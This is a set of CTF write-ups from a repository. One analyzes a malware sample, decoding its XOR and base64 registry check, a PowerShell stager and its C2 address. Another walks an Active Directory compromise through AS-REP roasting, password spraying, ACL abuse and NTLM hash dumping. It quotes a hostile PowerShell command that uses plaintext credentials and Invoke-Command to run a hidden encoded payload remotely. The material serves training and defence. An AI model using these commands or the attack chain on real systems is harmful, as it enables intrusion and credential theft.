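The burst detector keys on the (account, source address) pair so that a distributed spray across many accounts is not hidden inside one account's count, and it reports the first success after the burst because that is the event that turns a noisy login attempt into a compromise worth paging on.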
40 |
41 | 
42 |
43 | It seems even the mighty Sōsuke Aizen, the genius who once transcended the boundaries of Shinigami and Hollow, was outwitted in the cyber realm. How the tables have turned! Is this mysterious hacker the next Ichigo Kurosaki? In this digital battle, the lines between the real world and the spiritual realm blur, leaving us to wonder—has Aizen found his true match in this realm?
44 |
45 | Only the Soul King knows.
46 |
47 | 
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/README.md:
--------------------------------------------------------------------------------
1 | # In Quest for Rogue Dragon
2 |
3 | *A rogue dragon has invaded Isle of Berk. As a Dragon Rider, you must uncover the hidden registry key—the secret to taming this beast. Follow the trail like Hiccup and Toothless chasing the Bewilderbeast, uncovering the attacker’s lair. Can you tame this dragon before it burns everything down? The fate of Berk rests in your hands, help Hiccup in this adventure!*
4 |
5 | 
6 |
7 | 1. Reverse the executable and observe what value the crawler-point registry key must be equal to (the registry key path is HKLM\SOFTWARE\crawler-ctf\configuration, which can be obtained from the executable).
8 |
9 | 2. This is the pastebin endpoint. Follow the redirection and observe which C2 server this executable is connecting to.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Writeup.md:
--------------------------------------------------------------------------------
1 | # In Quest For Rogue Dragon
2 |
3 | When loading **rev.exe** into the IDA debugger and viewing its pseudocode, we observe that the executable reads from a registry key and performs some form of comparison. This behavior suggests that the malware may be validating system-specific data, potentially as a way to ensure it is running in the desired environment.
4 |
5 | 
6 |
7 | To investigate further, we can set a breakpoint on the registry query function and inspect which registry key is being accessed. By doing this, we can uncover the specific details that the malware is using to tailor its behavior to the victim’s system.
8 |
9 | 
10 |
11 | 
12 |
13 | Upon closer inspection, it becomes evident that the variable `a3` is being used as an XOR key, which is critical for decrypting the encoded data used by the malware.
14 |
15 | 
16 |
17 | 
18 |
19 | 
20 |
21 | Continuing the analysis, we notice that the value stored in the ECX register equals **0x12**. This value is the XOR key applied to the registry data. The malware then base64-encodes the result and compares it to the hardcoded value `PWthVSBaISZ7`, which we suspect is a crucial part of its logic.
22 | Our next step is to reverse that check: decode the base64 string and XOR the result with the key **0x12**.
23 |
24 | 
25 |
26 | The decoded value reveals the answer to the first question: `/ysG2H34i`.
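The check the binary performs (XOR the registry value with a single byte, base64-encode, compare to a constant) reverses cleanly, so the expected value can be recovered without patching anything. The Python below is an added example, not code from the writeup or from the sample itself; it uses only the two values the writeup states (`PWthVSBaISZ7` and `0x12`) and adds a fallback for the case where the key has not yet been spotted in the debugger.

```python
import base64

# Values taken from the writeup: the hardcoded comparison string and the key seen in ECX.
HARDCODED_B64 = "PWthVSBaISZ7"
XOR_KEY = 0x12


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ (key & 0xFF) for b in data)


def decode_expected_value(b64: str, key: int) -> str:
    """Reverse the binary's check: base64-decode, then XOR with the key.
    The result is the registry value the binary is waiting for."""
    return xor_bytes(base64.b64decode(b64), key).decode("ascii")


def encode_like_binary(value: str, key: int) -> str:
    """Forward direction, as the binary computes it: XOR the registry value, then base64."""
    return base64.b64encode(xor_bytes(value.encode("ascii"), key)).decode("ascii")


def printable_key_candidates(b64: str) -> list:
    """If the key were not visible in the debugger: list every single-byte key whose
    output is entirely printable ASCII. The real key must be among them, which turns
    a 256-way guess into a short list to eyeball."""
    raw = base64.b64decode(b64)
    return [k for k in range(256) if all(0x20 <= (b ^ k) <= 0x7E for b in raw)]


if __name__ == "__main__":
    print(decode_expected_value(HARDCODED_B64, XOR_KEY))   # the value the writeup finds
    print(len(printable_key_candidates(HARDCODED_B64)), "keys give printable output")
```

Because single-byte XOR preserves structure, `printable_key_candidates` is deliberately loose: it is a filter for an analyst to scan, not a proof, and the debugger value is always the authoritative key.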
27 |
28 | This string points us to a PasteBin endpoint, which the malware uses to retrieve additional payloads or commands. By following the link, we can gather further details about the attack and potentially uncover the final objective of the malware.
29 |
30 | 
31 |
32 | Upon visiting the endpoint, we find that it hosts a PowerShell script named **icsd.ps1**, which contains malicious code designed to establish persistence or gain further access to the compromised system.
33 |
34 | ```
35 | https://github.com/HuseynAghazada/for-ctf/blob/main/icsd.ps1
36 | ```
37 |
38 | The PowerShell script attempts to execute the following command, in which a password is passed as plain text to build a credential object that is then used to carry out the attack:
39 |
40 | ```
41 | powershell.exe -nop -w hidden -c $pass=ConvertTo-SecureString -string 'REDACTED' -asPlainText -force;$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist 'ICSD\bertholdt.hover',$pass;$ResultList=@();$iplist='10.100.11.250';foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start powershell.exe -nop -w hidden -noni -e --REDACTED-- } -Credential $creds;Sleep 20;
42 | ```
43 |
44 | The script establishes a reverse shell: for each IP in the list it resolves the hostname and uses `Invoke-Command` with the stolen credentials to launch a hidden, encoded PowerShell payload on that host, so the attacker can control the machine remotely. The hidden window (`-w hidden`) helps the command avoid notice, making it harder for the victim to realize they have been compromised.
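From the defender's side, the switch combination in that command line is itself the signal: a hidden window, no profile, a non-interactive encoded command, a plaintext credential and a remote `Invoke-Command` rarely appear together in legitimate administration. The following Python is an added example (not from the writeup or the script it analyzes) that scores process-creation command lines against those indicators; the sample lines are constructed, the first one reproducing the writeup's command with the same redactions.

```python
import re

# Constructed process-creation command lines. The first reproduces the command quoted in
# the writeup (secrets redacted as on the page); the other two are benign admin usage.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c $pass=ConvertTo-SecureString -string 'REDACTED' "
    "-asPlainText -force;$creds=new-object -typename System.Management.Automation.PSCredential "
    "-argumentlist 'ICSD\\bertholdt.hover',$pass;$iplist='10.100.11.250';Invoke-Command -AsJob "
    "-ComputerName $ResultList -ScriptBlock { cmd.exe /c start powershell.exe -nop -w hidden "
    "-noni -e --REDACTED-- } -Credential $creds;Sleep 20;",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
]

# Each indicator is a regex over the command line; matching is case-insensitive because
# PowerShell accepts abbreviated and mixed-case switches (-w, -W, -WindowStyle).
INDICATORS = {
    "hidden_window":   r"-w(?:indowstyle)?\s+hidden",
    "no_profile":      r"-nop(?:rofile)?\b",
    "non_interactive": r"-noni(?:nteractive)?\b",
    "encoded_command": r"(?<![\w-])-e(?:c|nc|ncodedcommand)?\s+\S+",
    "plaintext_cred":  r"ConvertTo-SecureString.*?-asPlainText",
    "remote_exec":     r"Invoke-Command\b.*?-ComputerName",
    "nested_shell":    r"cmd\.exe\s+/c\s+start\s+powershell",
}


def powershell_indicators(cmdline: str) -> set:
    """Names of every indicator that fires on one command line."""
    return {name for name, pat in INDICATORS.items()
            if re.search(pat, cmdline, re.IGNORECASE)}


def triage_cmdlines(cmdlines, threshold=2):
    """Keep only lines that trip at least `threshold` indicators: a single hit such as
    -NoProfile is routine, the combination seen in the writeup is not."""
    flagged = []
    for cmd in cmdlines:
        hits = powershell_indicators(cmd)
        if len(hits) >= threshold:
            flagged.append((cmd, sorted(hits)))
    return flagged


if __name__ == "__main__":
    for cmd, hits in triage_cmdlines(SAMPLE_CMDLINES):
        print(hits, "<-", cmd[:60], "...")
```

The threshold is the tuning knob: one indicator alone will fire on scheduled tasks and deployment tooling all day, whereas three or more on one line is worth an analyst's time, and `plaintext_cred` together with `remote_exec` is worth an immediate credential reset for the account named in the command.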
45 |
46 | Next, we proceed to decode the second part of the attack.
47 |
48 | 
49 |
50 | We discover another base64-encoded string, which is also compressed. This data likely contains further payloads or instructions for the malware to execute.
51 |
52 | 
53 |
54 | This compressed data contains shellcode, which is then decoded and executed by the malware.
55 |
56 | ```
57 | [Byte[]]$gNu7Y = [System.Convert]::FromBase64String("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")
58 | ```
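Both layers met so far are standard PowerShell stager packaging: the `-e` argument is base64 of a UTF-16LE script, and the inner blob is base64 of a compressed byte stream. The Python below is an added example, not the writeup's or the malware's code; because the page redacts the real blob, the inputs are constructed, and the assumption that the compression is gzip, zlib or raw deflate reflects what such stagers commonly use rather than anything the page states.

```python
import base64
import gzip
import zlib

# Constructed sample payloads (not the challenge's blob, which is redacted on the page).
INNER = b"CONSTRUCTED-STAGE-BYTES " * 8
ENCODED_CMD = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
GZ_BLOB = base64.b64encode(gzip.compress(INNER)).decode()
ZLIB_BLOB = base64.b64encode(zlib.compress(INNER)).decode()
_raw = zlib.compressobj(wbits=-zlib.MAX_WBITS)
RAW_DEFLATE_BLOB = base64.b64encode(_raw.compress(INNER) + _raw.flush()).decode()
PLAIN_BLOB = base64.b64encode(b"not compressed at all").decode()


def decode_encoded_command(b64: str) -> str:
    """powershell -e / -EncodedCommand carries base64 of a UTF-16LE script, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def unwrap_stage(b64_blob: str) -> bytes:
    """Base64-decode, then strip the usual compression wrapper: gzip (magic 1f 8b),
    zlib-wrapped deflate, or raw deflate. Uncompressed input is returned unchanged."""
    raw = base64.b64decode(b64_blob)
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw)
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):   # zlib header first, then raw deflate
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            continue
    return raw


def describe_bytes(data: bytes) -> dict:
    """Cheap facts for the analyst before loading the bytes into Ghidra: size, how much of
    it is printable ASCII (script vs. binary), and the leading bytes for a magic check."""
    printable = sum(0x20 <= b <= 0x7E for b in data)
    return {"size": len(data),
            "printable_ratio": round(printable / max(len(data), 1), 2),
            "head": data[:8].hex()}


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_CMD))
    print(describe_bytes(unwrap_stage(GZ_BLOB)))
```

A low printable ratio on the unwrapped bytes is the cue that the next step is a disassembler rather than a text editor, which is exactly the point at which the writeup switches to Ghidra.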
59 |
60 | Our goal now is to retrieve the command-and-control (C2) server’s IP address and port.
61 |
62 | 
63 |
64 | By debugging this shellcode with Ghidra, we can uncover the C2 server’s details. This will allow us to trace where the commands are being sent from and potentially stop the malware’s communication with the attacker.
65 |
66 | 
67 |
68 | The IP address and port used by the C2 server are **`172.26.26.172:8181`**, providing us with the final clue needed to understand the scope of the attack and begin mitigation efforts.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/README.md:
--------------------------------------------------------------------------------
1 | **C9 - End of Rumbling**
2 | *The fate of humanity is in your hands. The Rumbling is ending, and only the chosen one can bring peace or destruction. Uncover the hidden flags, symbols of hope, and decide the outcome of the race for humanity.*
3 |
4 | 
5 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C9 - End of Rumbling/writeup.md:
--------------------------------------------------------------------------------
1 | # C9 - End of Rumbling
2 |
3 | In this task we need to collect the hidden flags placed along the attack path. First we ran an nmap scan:
4 |
5 | 
6 |
7 | It seems the machine is a domain controller inside the `icsd.local` domain. From the hint, `armin.arlert` appears to be a domain user. Nmap's `krb5-enum-users.nse` script can help us discover other valid users.
8 |
9 | 
10 |
11 | Checking with impacket's `GetNPUsers`, we can see that this user is AS-REP roastable. After cracking the user's hash, the password `ocean` is obtained.
12 |
13 | 
14 |
15 | 
16 |
17 | Let’s search for all AD users using `crackmapexec` tool and create a list for them.
18 |
19 | 
20 |
21 | It seems the user Connie has the password ‘Br4tSumm3r’. According to Connie’s description, it is obvious that the user Jean has the same problem. Password spraying gives us that Jean has the same password as Connie.
22 |
23 | 
24 |
25 | 
26 |
27 | The user Jean has read access to the "Secret Mission" share. This share contains credentials for the user levi.
28 |
29 | 
30 |
31 | 
32 |
33 | Let’s use BloodHound:
34 |
35 | 
36 |
37 | 
38 |
39 | We analyzed the executable with Ghidra and found an encoded credential inside it.
40 |
41 | 
42 |
43 | Upon analyzing the data with BloodHound, we identified that Levi has **ForceChangePassword** delegation over **Zeke**. This means Levi can change Zeke’s password without knowing the current one.
44 |
45 | 
46 |
47 | We used this delegation privilege to change Zeke's password and log in as him.
48 |
49 | 
50 |
51 | Interestingly, Zeke had **GenericAll** privileges over **Reiner**, which allowed us to change Reiner's password as well. This opened up further access to the system.
52 |
53 | 
54 |
55 | so we again used it to change password.
56 |
57 | 

Further investigation into history data revealed that **Mikasa's** password had been leaked.

![Untitled](images/Untitled%2016.png)

After logging in as Mikasa, we found a **pcap** file and downloaded it for analysis.

![Untitled](images/Untitled%2017.png)

We started analyzing the file with tshark.

![Untitled](images/Untitled%2018.png)

The analysis revealed several keyboard events which, when decoded, provided **Eren's** password. This discovery was crucial, as Eren's credentials would bring us closer to the final objective.

[https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2](https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2)

![Untitled](images/Untitled%2019.png)

We decoded the following keypress events (HID report bytes -> key usage ID -> character) to uncover the password:

```text
0000130000000000 -> 0x13 -> p
0000040000000000 -> 0x04 -> a
0000160000000000 -> 0x16 -> s
0000160000000000 -> 0x16 -> s
00002c0000000000 -> 0x2C -> (SPACE)
00000c0000000000 -> 0x0C -> i
0000160000000000 -> 0x16 -> s
00002c0000000000 -> 0x2C -> (SPACE)
0000170000000000 -> 0x17 -> t
0000210000000000 -> 0x21 -> 4
0000170000000000 -> 0x17 -> t
0000210000000000 -> 0x21 -> 4
00000e0000000000 -> 0x0E -> k
0000210000000000 -> 0x21 -> 4
0000200000000000 -> 0x20 -> 3
0000370000000000 -> 0x37 -> .
0000280000000000 -> 0x28 -> (ENTER)
```
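Each line above is an 8-byte USB HID boot-keyboard report: a modifier bitmap, a reserved byte, then up to six key usage IDs from the keyboard/keypad usage page (the table in the linked gist). The decoder below is an added example, not part of the writeup: it takes the reports exactly as pasted above and generalises the manual lookup to handle Shift, Backspace and the all-zero key-release reports that a raw capture contains between keystrokes. The assumed extraction step is something like `tshark -r capture.pcap -Y 'usb.transfer_type == 0x01' -T fields -e usb.capdata`; the field name to use (`usb.capdata`, or `usbhid.data` on newer Wireshark builds) depends on the version, so check it against your own installation.

```python
"""Decode USB HID boot-keyboard reports into the text that was typed.
Added example, not from the original writeup. The reports in WRITEUP_REPORTS
are the ones listed in the writeup; the extraction command is an assumption."""

# Usage ID -> (unshifted, shifted) character, keyboard/keypad usage page.
KEYMAP = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())                    # 0x04..0x1d
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[0x1E + i] = (plain, shifted)                    # 0x1e..0x27
KEYMAP.update({
    0x28: ("\n", "\n"),    # Enter
    0x2B: ("\t", "\t"),    # Tab
    0x2C: (" ", " "),      # Space
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x02 | 0x20   # left Shift or right Shift bit in the modifier byte


def parse_capdata(text):
    """Turn tshark field output (one report per line, hex with or without
    colon separators) into a list of 8-byte reports, dropping anything that
    is not a full keyboard report."""
    reports = []
    for line in text.splitlines():
        line = line.strip().replace(":", "")
        if not line:
            continue
        data = bytes.fromhex(line)
        if len(data) == 8:
            reports.append(data)
    return reports


def decode_reports(reports):
    """Reconstruct the typed text from a sequence of 8-byte reports."""
    typed = []
    for rep in reports:
        keys = [k for k in rep[2:8] if k]   # a key-release report has no usage IDs
        if not keys:
            continue
        shifted = bool(rep[0] & SHIFT_MASK)
        for code in keys:
            if code == BACKSPACE:           # apply Backspace instead of printing it
                if typed:
                    typed.pop()
                continue
            pair = KEYMAP.get(code)
            typed.append(pair[shifted] if pair else f"<0x{code:02x}>")
    return "".join(typed)


# The reports shown in the writeup, as a practitioner would paste them.
WRITEUP_REPORTS = """\
0000130000000000
0000040000000000
0000160000000000
0000160000000000
00002c0000000000
00000c0000000000
0000160000000000
00002c0000000000
0000170000000000
0000210000000000
0000170000000000
0000210000000000
00000e0000000000
0000210000000000
0000200000000000
0000370000000000
0000280000000000
"""


def decode_writeup_capture():
    return decode_reports(parse_capdata(WRITEUP_REPORTS))


if __name__ == "__main__":
    print(repr(decode_writeup_capture()))
```

Host-side typematic repeat is not modelled (the host, not the device, repeats a held key), and unmapped usage IDs are emitted as `<0x..>` markers so that nothing silently disappears from the reconstruction.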

We used **impacket** to dump the NTLM hashes.

![Untitled](images/Untitled%2020.png)

Finally, using the administrator's credentials, we logged into the system and completed the final task.

![Untitled](images/Untitled%2021.png)
--------------------------------------------------------------------------------